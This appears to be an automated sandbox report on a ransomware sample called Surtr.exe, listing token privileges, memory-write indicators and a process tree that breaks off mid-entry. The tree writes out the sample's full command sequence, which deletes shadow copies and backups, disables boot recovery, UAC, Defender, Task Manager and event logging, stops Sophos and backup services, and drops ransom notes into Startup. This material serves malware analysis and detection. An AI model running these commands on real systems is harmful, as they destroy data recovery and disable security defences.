Token: SeBackupPrivilege	3196	wevtutil.exe
Token: SeSecurityPrivilege	368	wevtutil.exe
Token: SeBackupPrivilege	368	wevtutil.exe
Token: SeSecurityPrivilege	1792	wevtutil.exe
Token: SeBackupPrivilege	1792	wevtutil.exe
Token: SeSecurityPrivilege	3464	wevtutil.exe
Token: SeBackupPrivilege	3464	wevtutil.exe
Token: SeSecurityPrivilege	3616	wevtutil.exe
Token: SeBackupPrivilege	3616	wevtutil.exe
Token: SeSecurityPrivilege	3232	wevtutil.exe
Token: SeBackupPrivilege	3232	wevtutil.exe
Token: SeSecurityPrivilege	2924	wevtutil.exe
Token: SeBackupPrivilege	2924	wevtutil.exe
Token: SeSecurityPrivilege	2964	wevtutil.exe
Token: SeBackupPrivilege	2964	wevtutil.exe
Token: SeSecurityPrivilege	1260	wevtutil.exe
Token: SeBackupPrivilege	1260	wevtutil.exe
Token: SeSecurityPrivilege	2452	wevtutil.exe
Token: SeBackupPrivilege	2452	wevtutil.exe
Token: SeSecurityPrivilege	2120	wevtutil.exe
Token: SeBackupPrivilege	2120	wevtutil.exe
Token: SeSecurityPrivilege	788	wevtutil.exe
Token: SeBackupPrivilege	788	wevtutil.exe
Token: SeSecurityPrivilege	840	wevtutil.exe
Token: SeBackupPrivilege	840	wevtutil.exe
Token: SeSecurityPrivilege	740	wevtutil.exe
Token: SeBackupPrivilege	740	wevtutil.exe
Token: SeSecurityPrivilege	3396	wevtutil.exe
Token: SeBackupPrivilege	3396	wevtutil.exe
Token: SeSecurityPrivilege	2944	wevtutil.exe
Token: SeBackupPrivilege	2944	wevtutil.exe
Token: SeSecurityPrivilege	2220	wevtutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Surtr.exeSurtr.execmd.execmd.execmd.execmd.exenet.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 3916 wrote to memory of 3436	3916	Surtr.exe	Surtr.exe
PID 3916 wrote to memory of 3436	3916	Surtr.exe	Surtr.exe
PID 3916 wrote to memory of 3436	3916	Surtr.exe	Surtr.exe
PID 3916 wrote to memory of 3436	3916	Surtr.exe	Surtr.exe
PID 3916 wrote to memory of 3436	3916	Surtr.exe	Surtr.exe
PID 3916 wrote to memory of 3436	3916	Surtr.exe	Surtr.exe
PID 3916 wrote to memory of 3436	3916	Surtr.exe	Surtr.exe
PID 3436 wrote to memory of 3192	3436	Surtr.exe	cmd.exe
PID 3436 wrote to memory of 3192	3436	Surtr.exe	cmd.exe
PID 3436 wrote to memory of 3644	3436	Surtr.exe	cmd.exe
PID 3436 wrote to memory of 3644	3436	Surtr.exe	cmd.exe
PID 3436 wrote to memory of 1300	3436	Surtr.exe	cmd.exe
PID 3436 wrote to memory of 1300	3436	Surtr.exe	cmd.exe
PID 1300 wrote to memory of 752	1300	cmd.exe	chcp.com
PID 1300 wrote to memory of 752	1300	cmd.exe	chcp.com
PID 3436 wrote to memory of 3764	3436	Surtr.exe	cmd.exe
PID 3436 wrote to memory of 3764	3436	Surtr.exe	cmd.exe
PID 3436 wrote to memory of 1336	3436	Surtr.exe	cmd.exe
PID 3436 wrote to memory of 1336	3436	Surtr.exe	cmd.exe
PID 3436 wrote to memory of 820	3436	Surtr.exe	cmd.exe
PID 3436 wrote to memory of 820	3436	Surtr.exe	cmd.exe
PID 3764 wrote to memory of 1164	3764	cmd.exe	net.exe
PID 3764 wrote to memory of 1164	3764	cmd.exe	net.exe
PID 820 wrote to memory of 1216	820	cmd.exe	vssadmin.exe
PID 820 wrote to memory of 1216	820	cmd.exe	vssadmin.exe
PID 1336 wrote to memory of 3744	1336	cmd.exe	vssadmin.exe
PID 1336 wrote to memory of 3744	1336	cmd.exe	vssadmin.exe
PID 1164 wrote to memory of 3472	1164	net.exe	net1.exe
PID 1164 wrote to memory of 3472	1164	net.exe	net1.exe
PID 3436 wrote to memory of 4012	3436	Surtr.exe	cmd.exe
PID 3436 wrote to memory of 4012	3436	Surtr.exe	cmd.exe
PID 4012 wrote to memory of 3336	4012	cmd.exe	vssadmin.exe
PID 4012 wrote to memory of 3336	4012	cmd.exe	vssadmin.exe
PID 3436 wrote to memory of 2900	3436	Surtr.exe	cmd.exe
PID 3436 wrote to memory of 2900	3436	Surtr.exe	cmd.exe
PID 3436 wrote to memory of 3512	3436	Surtr.exe	cmd.exe
PID 3436 wrote to memory of 3512	3436	Surtr.exe	cmd.exe
PID 3512 wrote to memory of 3664	3512	cmd.exe	bcdedit.exe
PID 3512 wrote to memory of 3664	3512	cmd.exe	bcdedit.exe
PID 3436 wrote to memory of 4080	3436	Surtr.exe	cmd.exe
PID 3436 wrote to memory of 4080	3436	Surtr.exe	cmd.exe
PID 4080 wrote to memory of 60	4080	cmd.exe	bcdedit.exe
PID 4080 wrote to memory of 60	4080	cmd.exe	bcdedit.exe
PID 3436 wrote to memory of 2092	3436	Surtr.exe	cmd.exe
PID 3436 wrote to memory of 2092	3436	Surtr.exe	cmd.exe
PID 2092 wrote to memory of 1900	2092	cmd.exe	reg.exe
PID 2092 wrote to memory of 1900	2092	cmd.exe	reg.exe
PID 3436 wrote to memory of 3760	3436	Surtr.exe	cmd.exe
PID 3436 wrote to memory of 3760	3436	Surtr.exe	cmd.exe
PID 3760 wrote to memory of 3196	3760	cmd.exe	reg.exe
PID 3760 wrote to memory of 3196	3760	cmd.exe	reg.exe
PID 3436 wrote to memory of 1580	3436	Surtr.exe	cmd.exe
PID 3436 wrote to memory of 1580	3436	Surtr.exe	cmd.exe
PID 1580 wrote to memory of 540	1580	cmd.exe	reg.exe
PID 1580 wrote to memory of 540	1580	cmd.exe	reg.exe
PID 3436 wrote to memory of 3340	3436	Surtr.exe	cmd.exe
PID 3436 wrote to memory of 3340	3436	Surtr.exe	cmd.exe
PID 3340 wrote to memory of 1500	3340	cmd.exe	reg.exe
PID 3340 wrote to memory of 1500	3340	cmd.exe	reg.exe
PID 3436 wrote to memory of 1920	3436	Surtr.exe	cmd.exe
PID 3436 wrote to memory of 1920	3436	Surtr.exe	cmd.exe
PID 1920 wrote to memory of 2176	1920	cmd.exe	reg.exe
PID 1920 wrote to memory of 2176	1920	cmd.exe	reg.exe
PID 3436 wrote to memory of 2696	3436	Surtr.exe	cmd.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exe

pid process

2104 attrib.exe
2092 attrib.exe

pid	process
2104	attrib.exe
2092	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Surtr.exe
"C:\Users\Admin\AppData\Local\Temp\Surtr.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3916
- C:\Users\Admin\AppData\Local\Temp\Surtr.exe
  "C:\Users\Admin\AppData\Local\Temp\Surtr.exe"
  2⤵
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service
    3⤵
    PID:3192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @echo off
    3⤵
    PID:3644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c chcp 437
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1300
  - - C:\Windows\system32\chcp.com
      chcp 437
      4⤵
      PID:752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Acronis VSS Provider"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3764
  - - C:\Windows\system32\net.exe
      net stop "Acronis VSS Provider"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1164
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Acronis VSS Provider"
        5⤵
        
        PID:3472
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "AcrSch2Svc"
        5⤵
        
        PID:3172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1336
  - - C:\Windows\system32\vssadmin.exe
      vssadmin Delete Shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:3744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:820
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
      4⤵
      Interacts with shadow copies
      PID:1216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4012
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
      4⤵
      Interacts with shadow copies
      PID:3336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3512
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} recoveryenabled No
      4⤵
      Modifies boot configuration data using bcdedit
      PID:3664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q C:\*.bac C:\*.bak C:\*.bkf C:\Backup*.* C:\backup*.*
    3⤵
    PID:2900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4080
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
      4⤵
      Modifies boot configuration data using bcdedit
      PID:60
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2092
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      PID:1900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3760
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
      4⤵
      PID:3196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1580
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      PID:540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3340
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      4⤵
      PID:1500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1920
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
      4⤵
      PID:2176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
    3⤵
    PID:2696
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
      4⤵
      PID:2484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    PID:2624
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
      4⤵
      PID:812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
    3⤵
    PID:3032
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
      4⤵
      PID:516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    PID:1840
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
      4⤵
      PID:3520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    PID:3868
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
      4⤵
      PID:2992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
    3⤵
    PID:3012
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
      4⤵
      PID:2972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
    3⤵
    PID:3216
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
      4⤵
      PID:3304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
    3⤵
    PID:772
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
      4⤵
      PID:3656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
    3⤵
    PID:3516
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
      4⤵
      PID:3344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:2892
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
      4⤵
      PID:2668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop " Enterprise Client Service"
    3⤵
    PID:3056
  - - C:\Windows\system32\net.exe
      net stop " Enterprise Client Service"
      4⤵
      PID:204
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop " Enterprise Client Service"
        5⤵
        
        PID:3608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:3668
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
      4⤵
      PID:4016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Agent"
    3⤵
    PID:908
  - - C:\Windows\system32\net.exe
      net stop "Sophos Agent"
      4⤵
      PID:3988
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Agent"
        5⤵
        
        PID:4008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:3592
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
      4⤵
      PID:288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
    3⤵
    PID:3452
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
      4⤵
      PID:1924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
    3⤵
    PID:3840
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
      4⤵
      PID:560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos AutoUpdate Service"
    3⤵
    PID:1336
  - - C:\Windows\system32\net.exe
      net stop "Sophos AutoUpdate Service"
      4⤵
      PID:636
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos AutoUpdate Service"
        5⤵
        
        PID:1644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:2132
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
      4⤵
      PID:1536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Clean Service"
    3⤵
    PID:1900
  - - C:\Windows\system32\net.exe
      net stop "Sophos Clean Service"
      4⤵
      PID:3196
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Clean Service"
        5⤵
        
        PID:784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:2480
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
      4⤵
      PID:1788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Device Control Service"
    3⤵
    PID:1500
  - - C:\Windows\system32\net.exe
      net stop "Sophos Device Control Service"
      4⤵
      PID:2300
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Device Control Service"
        5⤵
        
        PID:2488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:2176
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
      4⤵
      PID:2484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:2324
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
      4⤵
      PID:2624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos File Scanner Service"
    3⤵
    PID:2588
  - - C:\Windows\system32\net.exe
      net stop "Sophos File Scanner Service"
      4⤵
      PID:3024
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos File Scanner Service"
        5⤵
        
        PID:3464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:3520
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
      4⤵
      PID:2968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Health Service"
    3⤵
    PID:384
  - - C:\Windows\system32\net.exe
      net stop "Sophos Health Service"
      4⤵
      PID:3300
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Health Service"
        5⤵
        
        PID:3012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:2972
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
      4⤵
      PID:3308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos MCS Agent"
    3⤵
    PID:3216
  - - C:\Windows\system32\net.exe
      net stop "Sophos MCS Agent"
      4⤵
      PID:360
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos MCS Agent"
        5⤵
        
        PID:3240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:2648
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
      4⤵
      PID:3716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos MCS Client"
    3⤵
    PID:3540
  - - C:\Windows\system32\net.exe
      net stop "Sophos MCS Client"
      4⤵
      PID:3044
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos MCS Client"
        5⤵
        
        PID:1280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
    3⤵
    PID:3112
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
      4⤵
      PID:3168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Message Router"
    3⤵
    PID:420
  - - C:\Windows\system32\net.exe
      net stop "Sophos Message Router"
      4⤵
      PID:1184
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Message Router"
        5⤵
        
        PID:3996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Safestore Service"
    3⤵
    PID:3980
  - - C:\Windows\system32\net.exe
      net stop "Sophos Safestore Service"
      4⤵
      PID:2808
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Safestore Service"
        5⤵
        
        PID:3592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c mkdir "C:\ProgramData\Service"
    3⤵
    PID:268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"
    3⤵
    PID:276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"
    3⤵
    - Drops startup file
    PID:1856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos System Protection Service"
    3⤵
    PID:1924
  - - C:\Windows\system32\net.exe
      net stop "Sophos System Protection Service"
      4⤵
      PID:3244
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos System Protection Service"
        5⤵
        
        PID:3880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"
    3⤵
    - Drops startup file
    PID:3636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Web Control Service"
    3⤵
    PID:3492
  - - C:\Windows\system32\net.exe
      net stop "Sophos Web Control Service"
      4⤵
      PID:860
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Web Control Service"
        5⤵
        
        PID:2140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"
    3⤵
    PID:1644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Public_DATA.surt" "%TEMP%\Service\Public_DATA.surt"
    3⤵
    PID:3852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Private_DATA.surt" "%TEMP%\Service\Private_DATA.surt"
    3⤵
    PID:2580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLsafe Backup Service"
    3⤵
    PID:540
  - - C:\Windows\system32\net.exe
      net stop "SQLsafe Backup Service"
      4⤵
      PID:2092
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLsafe Backup Service"
        5⤵
        
        PID:2788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"
    3⤵
    PID:3340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLsafe Filter Service"
    3⤵
    PID:2728
  - - C:\Windows\system32\net.exe
      net stop "SQLsafe Filter Service"
      4⤵
      PID:2488
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLsafe Filter Service"
        5⤵
        
        PID:2500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"
    3⤵
    PID:2656
- - C:\Windows\system32\cmd.exe
